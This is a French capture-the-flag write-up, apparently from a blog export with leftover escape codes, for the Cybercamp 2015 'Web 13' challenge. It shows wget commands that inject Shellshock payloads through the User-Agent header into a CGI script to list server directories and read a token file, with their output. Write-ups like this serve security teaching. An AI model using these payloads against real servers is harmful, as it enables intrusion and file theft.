Sur la page d’accueil, nous avons un formulaire demandant l’heure en secondes, ainsi qu’une frame pointant vers un fichier .cgi, qui lui, affiche l’heure en toutes lettres.
\nNotre 1\u00e8re id\u00e9e a \u00e9t\u00e9 de faire un script qui se synchronise avec l’heure affich\u00e9e par le .cgi afin de renvoyer l’heure exacte en secondes, au bon moment, mais cela n’a rien donn\u00e9.
\nL’id\u00e9e suivante a \u00e9t\u00e9 meilleure, un script cgi, une faille, ne serait-ce pas une exploitation de notre ch\u00e8re vuln\u00e9rabilit\u00e9 shellshock ?<\/p>\n
<\/p>\n
Un petit test avec wget nous a redonn\u00e9 le sourire ! La subtilit\u00e9 ici \u00e9tait de ne pas oublier de mettre le chemin COMPLET vers le binaire de ls, sinon \u00e7a ne fonctionnait pas \ud83d\ude09<\/p>\n
\r\nwget -U '() { :; }; echo; \/bin\/ls' -qO- http:\/\/challenge.cybercamp.es:8093\/cgi-bin\/date.cgi\r\n<\/pre>\nCette commande nous a retourn\u00e9 la liste des fichiers et dossiers du r\u00e9pertoire contenant date.cgi, mais rien d’int\u00e9ressant \u00e0 l’int\u00e9rieur.
\nLa suite \u00e9tait de deviner dans quel dossier se trouverait le flag.
\nAyant vu dans les headers http que le serveur tournait sous apache, on essaye de lister le r\u00e9pertoire par d\u00e9faut des fichiers web : \/var\/www\/html.<\/p>\n
\r\n$ wget -U '() { :; }; echo; \/bin\/ls -la \/var\/www\/html' -qO- http:\/\/challenge.cybercamp.es:8093\/cgi-bin\/date.cgi\r\ntotal 28\r\ndrwxr-xr-x 5 root root 4096 Jun 17 00:35 .\r\ndrwxr-xr-x 3 root root 4096 Jun 9 19:22 ..\r\ndrwxr-xr-x 2 root root 4096 Jul 22 11:51 css\r\n-rw-r--r-- 1 root root 34 Jun 9 23:04 datet0ken\r\ndrwxr-xr-x 2 root root 4096 Jul 22 11:51 fonts\r\n-rw-r--r-- 1 root root 1779 Jun 17 00:35 index.html\r\ndrwxr-xr-x 2 root root 4096 Jul 22 11:51 js\r\n<\/pre>\nSuper ! Il n’y a plus qu’\u00e0 r\u00e9cup\u00e9rer le token.<\/p>\n
\r\n$ wget -U '() { :; }; echo; \/bin\/cat \/var\/www\/html\/datet0ken' -qO- http:\/\/challenge.cybercamp.es:8093\/cgi-bin\/date.cgi\r\n7e88cc4325ac0a342ab1bb30f2706ba4\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"Sur la page d’accueil, nous avons un formulaire demandant l’heure en secondes, ainsi qu’une frame pointant vers un fichier .cgi, qui lui, affiche l’heure en toutes lettres. Notre 1\u00e8re id\u00e9e a \u00e9t\u00e9 de faire un script qui se synchronise avec l’heure affich\u00e9e par le .cgi afin de renvoyer l’heure exacte en secondes, au bon moment, … Continuer la lecture de [Cybercamp 2015] [Web 13] Write Up<\/span>